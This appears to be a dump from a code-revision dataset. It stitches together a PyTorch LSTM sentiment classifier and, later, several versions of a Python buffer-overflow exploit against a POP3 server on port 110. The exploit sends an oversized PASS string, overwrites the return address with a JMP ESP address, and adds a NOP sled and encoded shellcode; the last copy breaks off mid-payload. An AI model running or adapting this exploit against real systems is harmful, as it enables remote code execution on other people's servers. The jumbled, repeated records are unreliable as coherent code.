nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, text, text_lengths=None):
text = text.view(text.size()[1], -1)
embedded = self.embedding(text.long())
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
if self.bidirectional:
hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)
dense_outputs = self.fc(hidden)
outputs = self.act(dense_outputs)
return outputs
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
from custom_layers import custom_word_embedding
from custom_layers import Attention
from utils import load_emb_weights
import torch
from torch import nn
class classifier(nn.Module):
#define all the layers used in model
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers, embed_weights,
bidirectional=False, glove=True, init=True, dropout=0):
#Constructor
super().__init__()
self.bidirectional = bidirectional
if glove:
# Embedding layer using GloVe
self.embedding = custom_word_embedding(embed_weights)
else:
# Embedding layer without GloVe
self.embedding = nn.Embedding(embed_weights.shape[0], embed_weights.shape[1])
# LSTM layer and initialization
self.lstm = nn.LSTM(embedding_dim,
hidden_dim,
num_layers=n_layers,
bidirectional=bidirectional,
dropout=dropout,
batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
# Dense layer with initialization
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
nn.init.xavier_normal_(self.fc.weight)
#activation function
#self.act = nn.Sigmoid()
self.act = nn.Softmax(dim = 1)
def forward(self, text, text_lengths=None):
#text = [batch size,sent_length]
text = text.view(text.size()[1], -1) # Remove the useless 1st axis
embedded = self.embedding(text.long())
#embedded = [batch size, sent_len, emb dim]
embedded = embedded.float().cuda()
#packed sequence
#packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)
#si = embedded.size()
#embedded = embedded.view(si[1],si[2],si[3])
packed_output, (hidden, cell) = self.lstm(embedded)
#hidden = [batch size, num layers * num directions,hid dim]
#cell = [batch size, num layers * num directions,hid dim]
#concat the final forward and backward hidden state
if self.bidirectional:
hidden = torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)
#hidden = [batch size, hid dim * num directions]
dense_outputs=self.fc(hidden)
#Final activation function
outputs=self.act(dense_outputs)
return outputs
class AT_LSTM(nn.Module):
#define all the layers used in model
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
#Constructor
super().__init__()
# ATAE ?
self.ae = ae
self.at = at
self.embedding_dim= embedding_dim
# Embedding layer using GloVe or fasttext
self.embedding = custom_word_embedding(embed_weights)
# Embedding layer using Glove for aspects
self.aspects_embedding = custom_word_embedding(embed_weights)
# Embedding layer without GloVe
# self.embedding = nn.Embedding(emb_mat.shape[0], emb_mat.shape[1])
# LSTM layer and initialization
if self.ae:
self.lstm = nn.LSTM(embedding_dim*2,
hidden_dim,
num_layers=n_layers,
bidirectional=False,
dropout=dropout,
batch_first=True)
else:
self.lstm = nn.LSTM(embedding_dim,
hidden_dim,
num_layers=n_layers,
bidirectional=False,
dropout=dropout,
batch_first=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
# Attention layer with initialization
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
# Final dense layer with initialization
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
#activation function
#self.act = nn.Sigmoid()
self.act = nn.Softmax(dim = 1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1) # Remove the useless 1st axis
#text = [batch_size, sent_length]
categories = inp[1].view(inp[1].size()[1]).long() #categories = [batch_size]
embedded = self.embedding(text.long())
# ATAE
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(embedded_input_aspect.size()[0],1,self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,embedded.size()[1],1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
#packed sequence
#packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)
#si = embedded.size()
#embedded = embedded.view(si[1],si[2],si[3])
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
#packed_output = [batch_size, sent_length, hid_dim]
#hidden = [batch size, num layers * num directions,hid dim]
#cell = [batch size, num layers * num directions,hid dim]
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
#embedded_aspects = [batch_size, aspect_embedding_dim]
if self.at:
final_hidden = self.attention(embedded, embedded_aspects, packed_output)
else:
final_hidden = hidden
#hidden = [batch size, hid dim * num directions]
dense_outputs=self.fc(final_hidden)
#Final activation function
outputs=self.act(dense_outputs)
return outputs
|
flexible
|
{
"blob_id": "4692b2d19f64b3b4bd10c5eadd22a4b5a2f2ef37",
"index": 3923,
"step-1": "<mask token>\n\n\nclass classifier(nn.Module):\n <mask token>\n <mask token>\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-2": "<mask token>\n\n\nclass classifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,\n embed_weights, bidirectional=False, glove=True, init=True, dropout=0):\n super().__init__()\n self.bidirectional = bidirectional\n if glove:\n self.embedding = custom_word_embedding(embed_weights)\n else:\n self.embedding = nn.Embedding(embed_weights.shape[0],\n embed_weights.shape[1])\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,\n bidirectional=bidirectional, dropout=dropout, batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n <mask token>\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-3": "<mask token>\n\n\nclass classifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,\n embed_weights, bidirectional=False, glove=True, init=True, dropout=0):\n super().__init__()\n self.bidirectional = bidirectional\n if glove:\n self.embedding = custom_word_embedding(embed_weights)\n else:\n self.embedding = nn.Embedding(embed_weights.shape[0],\n embed_weights.shape[1])\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,\n bidirectional=bidirectional, dropout=dropout, batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, text, text_lengths=None):\n text = text.view(text.size()[1], -1)\n embedded = self.embedding(text.long())\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n if self.bidirectional:\n hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)\n dense_outputs = self.fc(hidden)\n outputs = self.act(dense_outputs)\n return outputs\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-4": "from custom_layers import custom_word_embedding\nfrom custom_layers import Attention\nfrom utils import load_emb_weights\nimport torch\nfrom torch import nn\n\n\nclass classifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,\n embed_weights, bidirectional=False, glove=True, init=True, dropout=0):\n super().__init__()\n self.bidirectional = bidirectional\n if glove:\n self.embedding = custom_word_embedding(embed_weights)\n else:\n self.embedding = nn.Embedding(embed_weights.shape[0],\n embed_weights.shape[1])\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,\n bidirectional=bidirectional, dropout=dropout, batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, text, text_lengths=None):\n text = text.view(text.size()[1], -1)\n embedded = self.embedding(text.long())\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n if self.bidirectional:\n hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)\n dense_outputs = self.fc(hidden)\n outputs = self.act(dense_outputs)\n return outputs\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-5": "from custom_layers import custom_word_embedding\nfrom custom_layers import Attention\nfrom utils import load_emb_weights\nimport torch\nfrom torch import nn\n\nclass classifier(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers, embed_weights,\n bidirectional=False, glove=True, init=True, dropout=0):\n\n #Constructor\n super().__init__()\n self.bidirectional = bidirectional\n\n if glove:\n # Embedding layer using GloVe\n self.embedding = custom_word_embedding(embed_weights)\n else:\n # Embedding layer without GloVe\n self.embedding = nn.Embedding(embed_weights.shape[0], embed_weights.shape[1])\n\n # LSTM layer and initialization\n self.lstm = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=dropout,\n batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n\n # Dense layer with initialization\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n #activation function\n #self.act = nn.Sigmoid()\n self.act = nn.Softmax(dim = 1)\n\n def forward(self, text, text_lengths=None):\n #text = [batch size,sent_length]\n text = text.view(text.size()[1], -1) # Remove the useless 1st axis\n embedded = self.embedding(text.long())\n #embedded = [batch size, sent_len, emb dim]\n embedded = embedded.float().cuda()\n #packed sequence\n #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n #si = embedded.size()\n #embedded = embedded.view(si[1],si[2],si[3])\n packed_output, (hidden, cell) = self.lstm(embedded)\n\n #hidden = [batch size, num layers * num directions,hid dim]\n #cell = [batch size, num layers * num directions,hid dim]\n\n #concat the final forward and backward hidden state\n if self.bidirectional:\n hidden = torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)\n\n #hidden = [batch size, hid dim * num directions]\n dense_outputs=self.fc(hidden)\n\n #Final activation function\n outputs=self.act(dense_outputs)\n\n return outputs\n\n\n\nclass AT_LSTM(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n\n #Constructor\n super().__init__()\n # ATAE ?\n self.ae = ae\n self.at = at\n self.embedding_dim= embedding_dim\n # Embedding layer using GloVe or fasttext\n self.embedding = custom_word_embedding(embed_weights)\n\n # Embedding layer using Glove for aspects\n self.aspects_embedding = custom_word_embedding(embed_weights)\n\n # Embedding layer without GloVe\n # self.embedding = nn.Embedding(emb_mat.shape[0], emb_mat.shape[1])\n\n # LSTM layer and initialization\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim*2,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=False,\n dropout=dropout,\n batch_first=True)\n else:\n self.lstm = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=False,\n dropout=dropout,\n batch_first=True)\n\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n\n # Attention layer with initialization\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n\n # Final dense layer with initialization\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n\n #activation function\n #self.act = nn.Sigmoid()\n self.act = nn.Softmax(dim = 1)\n\n def forward(self, inp, text_lengths=None):\n\n text = inp[0].view(inp[0].size()[1], -1) # Remove the useless 1st axis\n #text = [batch_size, sent_length]\n categories = inp[1].view(inp[1].size()[1]).long() #categories = [batch_size]\n\n embedded = self.embedding(text.long())\n\n # ATAE\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(embedded_input_aspect.size()[0],1,self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,embedded.size()[1],1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n\n #packed sequence\n #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n #si = embedded.size()\n #embedded = embedded.view(si[1],si[2],si[3])\n embedded = embedded.float().cuda()\n\n packed_output, (hidden, cell) = self.lstm(embedded)\n #packed_output = [batch_size, sent_length, hid_dim]\n #hidden = [batch size, num layers * num directions,hid dim]\n #cell = [batch size, num layers * num directions,hid dim]\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n #embedded_aspects = [batch_size, aspect_embedding_dim]\n\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects, packed_output)\n else:\n final_hidden = hidden\n #hidden = [batch size, hid dim * num directions]\n dense_outputs=self.fc(final_hidden)\n\n #Final activation function\n outputs=self.act(dense_outputs)\n\n return outputs\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s.connect((RHOST, RPORT))
<|reserved_special_token_0|>
shellcode_calc += b'\xba\xd5\x90\xd2}\xdb\xd5\xd9t$'
shellcode_calc += b'\xf4X1\xc9\xb161P\x13\x83'
shellcode_calc += b"\xe8\xfc\x03P\xdar'\x81\x0c\xf0"
shellcode_calc += b'\xc8z\xcc\x95A\x9f\xfd\x956\xeb'
shellcode_calc += b'\xad%<\xb9A\xcd\x10*\xd2\xa3'
shellcode_calc += b'\xbc]S\t\x9bPd"\xdf\xf3'
shellcode_calc += b'\xe69\x0c\xd4\xd7\xf1A\x15\x10\xef'
shellcode_calc += b'\xa8G\xc9{\x1ex~1\xa3\xf3'
shellcode_calc += b'\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80'
shellcode_calc += b'\x048L\xb9\x0c"\x91\x84\xc7\xd9'
shellcode_calc += b'ar\xd6\x0b\xb8{uru\x8e'
shellcode_calc += b'\x87\xb2\xb1q\xf2\xca\xc2\x0c\x05\t'
shellcode_calc += b'\xb9\xca\x80\x8a\x19\x983w\x98M'
shellcode_calc += b'\xa5\xfc\x96:\xa1[\xba\xbdf\xd0'
shellcode_calc += b'\xc66\x897O\x0c\xae\x93\x14\xd6'
shellcode_calc += b'\xcf\x82\xf0\xb9\xf0\xd5[eU\x9d'
shellcode_calc += b'qr\xe4\xfc\x1f\x85z{m\x85'
shellcode_calc += b'\x84\x84\xc1\xee\xb5\x0f\x8eiJ\xda'
shellcode_calc += b'\xeb\x96\xa8\xcf\x01?u\x9a\xa8"'
shellcode_calc += b'\x86p\xeeZ\x05q\x8e\x98\x15\xf0'
shellcode_calc += b'\x8b\xe5\x91\xe8\xe1vt\x0fVv'
shellcode_calc += b']a=\xfc~\x0b\xce\x99\x0c\xd3'
shellcode_calc += b'\x1f\x03\x95w\x7f\xa54\x13\x1a\t'
shellcode_calc += b'\xd1\x82\x8f,/5.\xdc<\xb5'
<|reserved_special_token_0|>
buf += 'A' * (offset_srp - len(buf))
buf += struct.pack('<I', jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += 'D' * (buf_totlen - len(buf))
<|reserved_special_token_0|>
s.send('USER username' + '\r\n')
<|reserved_special_token_0|>
s.send('PASS ' + buf + '\r\n')
<|reserved_special_token_0|>
s.close
<|reserved_special_token_1|>
<|reserved_special_token_0|>
RHOST = '10.10.10.2'
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
jmp_esp = 1598698895
nop_sled = '\x90' * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b''
shellcode_calc += b'\xba\xd5\x90\xd2}\xdb\xd5\xd9t$'
shellcode_calc += b'\xf4X1\xc9\xb161P\x13\x83'
shellcode_calc += b"\xe8\xfc\x03P\xdar'\x81\x0c\xf0"
shellcode_calc += b'\xc8z\xcc\x95A\x9f\xfd\x956\xeb'
shellcode_calc += b'\xad%<\xb9A\xcd\x10*\xd2\xa3'
shellcode_calc += b'\xbc]S\t\x9bPd"\xdf\xf3'
shellcode_calc += b'\xe69\x0c\xd4\xd7\xf1A\x15\x10\xef'
shellcode_calc += b'\xa8G\xc9{\x1ex~1\xa3\xf3'
shellcode_calc += b'\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80'
shellcode_calc += b'\x048L\xb9\x0c"\x91\x84\xc7\xd9'
shellcode_calc += b'ar\xd6\x0b\xb8{uru\x8e'
shellcode_calc += b'\x87\xb2\xb1q\xf2\xca\xc2\x0c\x05\t'
shellcode_calc += b'\xb9\xca\x80\x8a\x19\x983w\x98M'
shellcode_calc += b'\xa5\xfc\x96:\xa1[\xba\xbdf\xd0'
shellcode_calc += b'\xc66\x897O\x0c\xae\x93\x14\xd6'
shellcode_calc += b'\xcf\x82\xf0\xb9\xf0\xd5[eU\x9d'
shellcode_calc += b'qr\xe4\xfc\x1f\x85z{m\x85'
shellcode_calc += b'\x84\x84\xc1\xee\xb5\x0f\x8eiJ\xda'
shellcode_calc += b'\xeb\x96\xa8\xcf\x01?u\x9a\xa8"'
shellcode_calc += b'\x86p\xeeZ\x05q\x8e\x98\x15\xf0'
shellcode_calc += b'\x8b\xe5\x91\xe8\xe1vt\x0fVv'
shellcode_calc += b']a=\xfc~\x0b\xce\x99\x0c\xd3'
shellcode_calc += b'\x1f\x03\x95w\x7f\xa54\x13\x1a\t'
shellcode_calc += b'\xd1\x82\x8f,/5.\xdc<\xb5'
buf = ''
buf += 'A' * (offset_srp - len(buf))
buf += struct.pack('<I', jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += 'D' * (buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close
<|reserved_special_token_1|>
import socket
import struct
RHOST = '10.10.10.2'
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
jmp_esp = 1598698895
nop_sled = '\x90' * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b''
shellcode_calc += b'\xba\xd5\x90\xd2}\xdb\xd5\xd9t$'
shellcode_calc += b'\xf4X1\xc9\xb161P\x13\x83'
shellcode_calc += b"\xe8\xfc\x03P\xdar'\x81\x0c\xf0"
shellcode_calc += b'\xc8z\xcc\x95A\x9f\xfd\x956\xeb'
shellcode_calc += b'\xad%<\xb9A\xcd\x10*\xd2\xa3'
shellcode_calc += b'\xbc]S\t\x9bPd"\xdf\xf3'
shellcode_calc += b'\xe69\x0c\xd4\xd7\xf1A\x15\x10\xef'
shellcode_calc += b'\xa8G\xc9{\x1ex~1\xa3\xf3'
shellcode_calc += b'\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80'
shellcode_calc += b'\x048L\xb9\x0c"\x91\x84\xc7\xd9'
shellcode_calc += b'ar\xd6\x0b\xb8{uru\x8e'
shellcode_calc += b'\x87\xb2\xb1q\xf2\xca\xc2\x0c\x05\t'
shellcode_calc += b'\xb9\xca\x80\x8a\x19\x983w\x98M'
shellcode_calc += b'\xa5\xfc\x96:\xa1[\xba\xbdf\xd0'
shellcode_calc += b'\xc66\x897O\x0c\xae\x93\x14\xd6'
shellcode_calc += b'\xcf\x82\xf0\xb9\xf0\xd5[eU\x9d'
shellcode_calc += b'qr\xe4\xfc\x1f\x85z{m\x85'
